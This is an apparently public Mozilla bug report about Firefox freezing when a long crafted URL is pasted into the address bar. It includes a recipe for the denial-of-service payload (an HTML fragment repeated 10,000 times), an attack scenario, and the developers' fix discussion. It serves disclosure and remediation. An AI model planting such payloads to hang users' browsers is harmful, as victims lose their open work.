Firefox stop responding after pasting payload in search/address bar.
Categories
(Firefox :: Address Bar, defect, P2)
Tracking
()
People
(Reporter: 7rp, Assigned: mak)
References
(Blocks 1 open bug)
Details
(Keywords: csectype-dos, hang, sec-low, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(2 files)
Summary:
I found strange behavior when I paste long crafted url in search/address bar. I should mention that I use default settings in all browsers, so my address and search bars are not separated.
Steps to reproduce:
- Visit attached html page and click "Click here!" button. I viewed it locally, but you can put in anywhere, it doesn't matter. You can also manually generate payload and copy it in your clipboard.
- Paste your clipboard contents in search/address bar. It's not required to press enter, and anyway, browser will freeze before you can press any button.
- Browser will stop responding (cpu consumption will be too high)
Payload:
Can be crafted with python, or any program language
Consists of two parts - 'https://google.com/?id=2' + '<div="" class="">a</div></div></div><!---></div>' * 10000
You can use any domain in first part, and different multipliers in second part. Multiplier affects cpu consumption, higher multiplier -> higher consumption. I suppose 10000 will be enough to freeze Firefox on almost all processors.
Tested on Windows 10 Pro and Kali Linux:
Firefox Browser latest (84.0.1)
Firefox ESR latest (78.6.0esr)
Attack scenario:
Victim copy/click anything on attacker website, and than try to search it via bar. Firefox will freeze, victim will force quit, all work in other tabs will be lost.
Despite the fact that impact is relatively low, it can be an indicator of more serious bug. It also affects different browser editions and platforms, so I think it worth to report.
|
Reporter | |
Comment 1•3 years ago
|
||
| Comment hidden (offtopic) |
| Comment hidden (offtopic) |
| Comment hidden (offtopic) |
|
|
Reporter | |
Comment 5•3 years ago
|
||
I suppose, that bug 1684754 has different root case, affecting another component (not address bar), so I originally reported it separately. I've filled 1685067 to cover scenarios which was mentioned in comments here.
(In reply to Daniel Veditz [:dveditz] from comment #4)
Can confirm. The reporter filed the iOS variant as bug 1684754 so I'll be hiding the comments related to that.
|
|
Reporter | |
Updated•3 years ago
|
|
Assignee | |
Comment 6•3 years ago
|
||
Bug 1589602 is still open for long strings being slow, even if we catched most common cases already. But it's likely this is about recognizing the kind of string, for which we fixed a similar bug a few versions ago.
I'll profile it and see.
|
|
Assignee | |
Updated•3 years ago
|
|
|
Assignee | |
Updated•3 years ago
|
|
|
Assignee | |
Comment 7•3 years ago
•
|
||
I suspect bug 1682434 reduced a lot the problem here, from the profile I see us spending time in the same area.
Could you please test with Firefox 85+?
The only other thing we could do here, that I plan doing actually, is to avoid highlighting fallback url heuristic results, they are the full url anyway, making it full bold doesn't bring any benefit and rather makes them less readable. It is an expensive highlight that has no real purpose.
|
|
Assignee | |
Comment 8•3 years ago
|
||
I filed Bug 1687767 about another couple things where we can save some time to improve perf. Along with bug 1682434 it should pretty much affect the code path this bug is about.
|
|
Reporter | |
Comment 9•3 years ago
|
||
(In reply to Marco Bonardo [:mak] from comment #7)
I suspect bug 1682434 reduced a lot the problem here, from the profile I see us spending time in the same area.
Could you please test with Firefox 85+?The only other thing we could do here, that I plan doing actually, is to avoid highlighting fallback url heuristic results, they are the full url anyway, making it full bold doesn't bring any benefit and rather makes them less readable. It is an expensive highlight that has no real purpose.
Can confirm, couldn't reproduce bug on Firefox Browser 85.0, Windows 10.
|
|
Assignee | |
Comment 10•3 years ago
|
||
Thanks, it sounds like we're done here, the bug was fixed by bug 1682434, and performance was further improved with Bug 1687767.
I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.
I don't think the cost of uplift is worth for ESR78 considered this is an uncommon DOS in the Address Bar and a sec-low. Feel free to chime in if you think differently.
|
|
Reporter | |
Comment 11•3 years ago
|
||
(In reply to Marco Bonardo [:mak] from comment #10)
Thanks, it sounds like we're done here, the bug was fixed by bug 1682434, and performance was further improved with Bug 1687767.
I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.
I don't think the cost of uplift is worth for ESR78 considered this is an uncommon DOS in the Address Bar and a sec-low. Feel free to chime in if you think differently.
Absolutely agreed. Is it worth to request a CVE for that?
|
|
Assignee | |
Comment 12•3 years ago
|
||
That's a question for the security team.
|
||
Comment 13•3 years ago
|
||
(In reply to Marco Bonardo [:mak] from comment #10)
I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.
A year or so ago Bugzilla was fixed so that dependencies aren't shown if you can't see the hidden bug: it's OK to add these now. NOTE: "See Also" items are still 100% visible. So far only depends on/blocks/regressed by/regressions were fixed.
(In reply to Marco Bonardo [:mak] from comment #12)
[worth requesting a CVE?] That's a question for the security team.
You can ask (send mail to security@mozilla.org), but I don't know if we'd issue a CVE for a DOS like this.
|
||
Updated•3 years ago
|
|
||
Updated•3 years ago
|
|
|
||
Updated•2 years ago
|
Description
•